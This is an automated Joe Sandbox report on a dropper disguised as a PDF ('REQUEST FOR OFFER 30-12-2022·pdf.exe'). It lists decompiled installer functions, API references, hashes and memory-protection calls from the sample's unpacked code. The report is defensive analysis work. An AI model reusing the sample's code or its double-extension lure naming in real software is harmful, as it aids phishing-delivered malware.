String ID: 4t.t$0_B
API String ID: 3248276644-3875741198
Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
Instruction ID: ff48dfae10af5decf38b12d619470e329e8f167eeffaec785d8039fb28d6ac4e
Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
Instruction Fuzzy Hash: 6DF04439108F612AE622323A2D08ABF1A14CF8236474A423FF851B12D1CB3C8D43DC6E

Uniqueness

Uniqueness Score: -1.00%

Function 004060DF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004060DF(void* _a4, int _a8, short* _a12, int _a16, void* _a20) {
				long _t20;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExW(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				if(_t20 == 0) {
					_a8 = 0x800;
					if(RegQueryValueExW(_a20, _a12, 0,  &_a16, _t26,  &_a8) != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x7fe] = 0;
					return RegCloseKey(_a20);
				}
				return _t20;
			}

0x004060ef
0x004060f1
0x004060fe
0x00406109
0x00406111
0x00406116
0x00406132
0x00406140
0x00406140
0x00406146
0x00000000
0x0040614d
0x00406156

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00406109
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040612A
RegCloseKey.ADVAPI32(?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040614D

Strings

Call, xrefs: 004060E2

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: 5a49725d9b8b462efd799bce316dcbaad7059079bb26d9a6c1e38be835131f9e
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 2F015A3110020AEACF218F26ED08EDB3BA9EF88391F01403AFD55D6220D774D964CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405BC6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405BC6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405bc7
0x00405bd4
0x00405bd5
0x00405be0
0x00405be8
0x00405be8
0x00405bf0

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BCC
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BD6
lstrcatW.KERNEL32(?,0040A014), ref: 00405BE8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC6

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction ID: 65d0506ad812cb1a76e9921ecf3bea8c464967d5314b17a54056b3388df28152
Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction Fuzzy Hash: 41D05E31101535AAC2117B44AC04CDB66AC9E46304342487EF541B60A9C77C696296EE

Uniqueness

Uniqueness Score: -1.00%

Function 00403969 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403969() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2bc
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2c8
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039C6();
				return E00405A03(_t11, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\nsq493.tmp", 7);
			}

0x00403969
0x00403978
0x0040397b
0x0040397d
0x0040397d
0x00403984
0x0040398c
0x0040398f
0x00403991
0x00403991
0x00403991
0x00403998
0x004039aa

APIs

CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040397B
CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040398F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040396E
C:\Users\user\AppData\Local\Temp\nsq493.tmp, xrefs: 0040399F

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsq493.tmp
API String ID: 2962429428-1652391211
Opcode ID: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
Instruction ID: b4aeda79ce9169ff0691def1b455dd989f45c243b0b2f58971613af12f624ab5
Opcode Fuzzy Hash: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
Instruction Fuzzy Hash: 07E02CB080070492C130AF3CAE4D8853A285F4133A720432BF038F20F0C7788AAB0EA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403D31 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403D31(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = L"1033";
				_t13 = 0xffff;
				_t6 = E00406172(__ecx, L"1033");
				while(1) {
					_t26 =  *0x42a284;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x42a250 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42a280;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x429220 = _t18[1];
					 *0x42a2e8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42921c = _t23;
						E00406159(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextW( *0x423708, E00406234(_t13, _t24, _t26, 0x429240, 0xfffffffe));
						_t11 =  *0x42a26c;
						_t27 =  *0x42a268;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00406234(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x818;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x00403d35
0x00403d3a
0x00403d40
0x00403d45
0x00403d45
0x00403d4d
0x00000000
0x00000000
0x00403d55
0x00403d5d
0x00403d5f
0x00403d65
0x00403d65
0x00403d67
0x00403d73
0x00000000
0x00000000
0x00403d77
0x00000000
0x00000000
0x00000000
0x00403d79
0x00403d7e
0x00403d87
0x00403d8d
0x00403d92
0x00403da6
0x00403db1
0x00403dc9
0x00403dcf
0x00403dd4
0x00403ddc
0x00403dfd
0x00403dfd
0x00403dfd
0x00403dde
0x00403de0
0x00403de0
0x00403de4
0x00403deb
0x00403deb
0x00403df0
0x00403df6
0x00403df6
0x00000000
0x00403de0
0x00403d94
0x00403d99
0x00403da2
0x00403d9b
0x00403d9b
0x00403d9b
0x00403d99

APIs

SetWindowTextW.USER32(00000000,00429240), ref: 00403DC9

Strings

"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe", xrefs: 00403D32
1033, xrefs: 00403D35, 00403D3F, 00403DB0

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe"$1033
API String ID: 530164218-553773588
Opcode ID: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
Instruction ID: 03976cd0908ed948c9bf00cc325fcd7bd37552fd0e89046400bf063f4d175d83
Opcode Fuzzy Hash: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
Instruction Fuzzy Hash: 5D11D131B44210DBC734AF15DC80A377BADEF85715B2841BFE8016B3A1DB3A9D0386A9

Uniqueness

Uniqueness Score: -1.00%

Function 004052E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004052E5(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423714 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423714 = _t16;
							E00404CBB();
						}
						L11:
						return CallWindowProcW( *0x42371c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C3B(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404322(0x413);
				return 0;
			}

0x004052e9
0x004052f3
0x0040530f
0x00405331
0x00405334
0x0040533a
0x00405344
0x00405345
0x00405347
0x0040534d
0x0040534d
0x00405357
0x00000000
0x00405365
0x0040531c
0x00405354
0x00405354
0x00000000
0x00405354
0x00405328
0x0040532a
0x00000000
0x0040532a
0x004052f9
0x00000000
0x00000000
0x00405300
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405314
CallWindowProcW.USER32(?,?,?,?), ref: 00405365

Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334

Strings

, xrefs: 004052F5

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
Instruction ID: 55ce392e6746b2cc60fd0279fd4fa9b35be9dafe7b92107a95c9794c7a372d77
Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
Instruction Fuzzy Hash: 8F01B1B2200708ABEF209F11DD80AAB3725EB80395F545036FE007A1D1C3BA8D929E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C12 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405C12(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405c13
0x00405c1d
0x00405c20
0x00405c26
0x00405c27
0x00405c28
0x00405c30
0x00000000
0x00000000
0x00000000
0x00405c30
0x00405c32
0x00405c3a

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe,C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe,80000000,00000003), ref: 00405C18
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe,C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe,80000000,00000003), ref: 00405C28

Strings

C:\Users\user\Desktop, xrefs: 00405C12

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction ID: 7c763ee06e751a121eeaaae5fe0630bfdebb5bec0d299de236eb7caac3423831
Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction Fuzzy Hash: BCD05EB2404A249ED322A704ED0499F67A8EF12300786886AE440A6165D7789C8186AD

Uniqueness

Uniqueness Score: -1.00%

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}

0x100010e6
0x100010f0
0x100010ff
0x1000110e
0x10001119
0x1000111c
0x1000112b
0x1000112f
0x10001131
0x100011d8
0x100011de
0x10001137
0x10001138
0x10001138
0x1000113d
0x1000113e
0x10001140
0x10001143
0x1000120d
0x10001210
0x100011b0
0x100011b6
0x100011bf
0x100011c4
0x100011c7
0x00000000
0x100011c7
0x10001212
0x10001214
0x10001196
0x1000119d
0x100011a5
0x00000000
0x100011a5
0x10001161
0x10001162
0x1000116a
0x10001177
0x1000117f
0x10001188
0x1000118d
0x1000118d
0x00000000
0x10001162
0x10001149
0x100011df
0x100011df
0x100011e6
0x100011f3
0x100011f8
0x100011fb
0x10001203
0x10001205
0x10001205
0x00000000
0x100011e6
0x1000114f
0x10001152
0x00000000
0x00000000
0x10001158
0x1000115b
0x100011ac
0x00000000
0x100011ac
0x1000115d
0x1000115f
0x10001192
0x00000000
0x10001192
0x00000000
0x100011c9
0x100011c9
0x100011d3
0x00000000
0x100011d7

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000002.00000002.54387884763.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.54387828656.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387928274.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387958519.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Uniqueness

Uniqueness Score: -1.00%

Function 00405D4C Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D4C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405d5c
0x00405d5e
0x00405d61
0x00405d8d
0x00405d66
0x00405d6f
0x00405d74
0x00405d7f
0x00405d82
0x00405d9e
0x00405d84
0x00405d8b
0x00000000
0x00405d8b
0x00405d97
0x00405d9b
0x00405d9b
0x00405d95
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D74
CharNextA.USER32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D85
lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
Instruction ID: 1f72a7e7db10584d46f5d47bab472a29a69204e410489cb336b3e0253d2e012c
Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
Instruction Fuzzy Hash: 31F09631104918FFC712DFA5DD0499FBBA8EF06350B2580BAE841F7251D674DE019F99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exePID: 7568, Parent PID: 4112COMMON

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	33
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0168157A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(000000FF), ref: 016815A8

Strings

GDhd, xrefs: 016613C5

Memory Dump Source

Source File: 00000005.00000002.54390766320.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1660000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: GDhd
API String ID: 2706961497-3085950570
